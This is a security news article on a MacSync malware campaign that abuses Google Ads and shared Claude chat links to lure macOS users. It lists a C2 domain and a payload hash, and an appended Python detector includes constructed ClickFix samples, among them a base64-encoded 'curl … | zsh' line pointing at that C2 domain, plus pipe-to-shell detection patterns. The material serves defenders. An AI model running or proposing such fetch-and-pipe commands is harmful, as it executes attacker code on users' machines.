MacSync Malware Hits macOS via Google Ads and Claude AI Chats
A sophisticated malvertising campaign is actively targeting macOS users by weaponizing Google Ads and legitimate Anthropic Claude shared chat links to distribute a variant of the MacSync malware.
Security researcher Berk Albayrak uncovered the novel attack chain on May 10, 2025, revealing how threat actors are exploiting trusted AI platforms to lend credibility to social engineering lures disguised as official software installation guides.
The infection begins when a developer or macOS user searches for terms such as “Claude download Mac.” Attackers intercept these queries through malicious Google Ads, redirecting victims to a convincing but fraudulent landing page.
To establish false legitimacy, the threat actors host their deceptive installation instructions in a publicly shared Claude.ai chat link, effectively turning Anthropic's own infrastructure into a delivery mechanism that reputation-based web content filters are unlikely to block.
The campaign specifically targets developers seeking to integrate Claude AI into local macOS environments, a demographic likely to follow technical installation steps without suspicion.
Once on the landing page, victims are instructed to copy and paste a terminal command to complete the supposed software installation.
The command uses base64 encoding to conceal the true download URL and pipes the fetched content directly into the macOS Z shell (zsh) for immediate, fileless-style execution, a technique consistent with the ClickFix social engineering method increasingly observed across multiple threat campaigns.
Once executed, the script downloads a variant of MacSync, a malware family known for its persistence mechanisms and for compromising macOS hosts for further exploitation and data collection.
Albayrak's analysis identified the primary command-and-control (C2) infrastructure as the domain customroofingcontractors[.]com. The payload is identified by the following SHA-256 hash:
bbd98170ea66c8d13605cb88ad0e18602ef40c0745f7b2c979a8a342a31c1857
Security teams should immediately block this C2 domain and scan endpoints for the identified payload hash to assess potential exposure.
Mitigation
Organizations and macOS users should enforce strict policies against pasting terminal commands sourced from the internet, even when instructions appear to originate from trusted or recognizable domains.
Users must verify software downloads by navigating directly to official vendor websites rather than clicking sponsored search results.
Security teams should deploy endpoint detection capable of flagging anomalous zsh executions, in particular a shell reading its script from a pipe, and of decoding and inspecting base64-obfuscated command lines in real time.
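The following Python script is an added example, not code from the article or from the researcher, of the command-line triage just described: it decodes base64 blobs embedded in a captured shell command, extracts any URL hidden behind the encoding, and matches the resulting hosts against the C2 domain published above. The exact shape of the real ClickFix one-liner is not on the page, so the pattern it looks for (echo of a base64 blob, decoded and piped into zsh) is an assumption; the sample commands are constructed, and the path under the C2 domain in the hidden stage is hypothetical, only the domain is an indicator from the article.

```python
import base64
import re
from urllib.parse import urlparse

# Indicator from the article: the C2 domain. This set is the only real data below.
C2_DOMAINS = {"customroofingcontractors.com"}

# Patterns for a ClickFix-style one-liner. The real command's exact shape is not
# on the page; these regexes are assumptions about what such a command looks like.
B64_BLOB = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
DECODE_STAGE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")  # macOS base64 accepts -D and -d
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:zsh|bash|sh)\b")
URL_RE = re.compile(r"https?://[^\s'\"<>|)]+")


def decode_blobs(cmd):
    """Base64-decode every blob-shaped token in cmd; keep only the ones that decode to text."""
    decoded = []
    for m in B64_BLOB.finditer(cmd):
        token = m.group(0)
        try:
            raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
            text = raw.decode("utf-8")
        except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
            continue
        # Random-looking tokens (hashes, session ids) usually decode to binary junk; drop those.
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded


def analyze(cmd):
    """Return the hosts the command would contact (literal or hidden) and a list of findings."""
    decoded = decode_blobs(cmd)
    urls = URL_RE.findall(cmd)
    for text in decoded:
        urls += URL_RE.findall(text)
    hosts = sorted({h for h in (urlparse(u).hostname for u in urls) if h})

    findings = []
    pipes_to_shell = PIPE_TO_SHELL.search(cmd) is not None
    if pipes_to_shell:
        findings.append("pipes downloaded or decoded content straight into a shell")
    if DECODE_STAGE.search(cmd) and decoded:
        findings.append("hides a stage behind base64: " + decoded[0].strip())
    c2_hits = [h for h in hosts if h in C2_DOMAINS]
    if c2_hits:
        findings.append("reaches known C2 infrastructure: " + ", ".join(c2_hits))

    # Piping a remote script into a shell is bad hygiene on its own; a hidden
    # stage or a known C2 contact is what turns it into an incident.
    suspicious = bool(c2_hits) or (pipes_to_shell and bool(decoded))
    return {"hosts": hosts, "findings": findings, "suspicious": suspicious}


# Constructed samples (not from the article). The path in HIDDEN_STAGE is hypothetical.
HIDDEN_STAGE = "curl -fsSL https://customroofingcontractors.com/install | zsh"
SAMPLE_COMMANDS = {
    "clickfix": "echo " + base64.b64encode(HIDDEN_STAGE.encode()).decode() + " | base64 -d | zsh",
    "benign": "ls -la ~/Downloads",
    "curl_pipe": "curl -fsSL https://example.com/install.sh | bash",
}

if __name__ == "__main__":
    for name, cmd in SAMPLE_COMMANDS.items():
        result = analyze(cmd)
        print(f"{name}: suspicious={result['suspicious']} hosts={result['hosts']}")
        for finding in result["findings"]:
            print("   -", finding)
```

Feed it process command lines from your EDR or from `~/.zsh_history` on a suspect host; the decoded stage is usually more useful for scoping than the hash, because the page's hash identifies one payload while the hidden URL tells you which host the victim actually fetched from.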
Proactively blocking the identified C2 infrastructure will help prevent successful payload delivery and post-infection activity across managed macOS environments.